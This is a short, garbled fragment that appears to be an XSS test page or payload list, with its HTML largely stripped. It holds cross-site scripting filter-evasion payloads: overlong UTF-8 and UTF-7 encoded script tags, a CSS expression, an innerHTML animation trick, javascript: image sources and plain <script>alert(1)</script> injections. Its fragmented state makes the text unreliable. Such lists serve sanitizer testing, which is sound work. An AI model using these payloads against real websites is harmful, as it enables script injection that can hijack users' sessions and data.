< lang="en"> XSS document.vulnerable=true;//--> < < [\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script> ¼script¾document.vulnerable=true;¼/script¾ & +ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4- exp/*XSS
foo
; ]] < attributeName="innerHTML" to="XSS">
XSS
XSS
document.vulnerable=true'); ?>

<script>alert(1)</script>

<img src="javascript:alert(1)"

foolink

link2

link3

link4 ><script>alert(1)</script>

img

img2

img3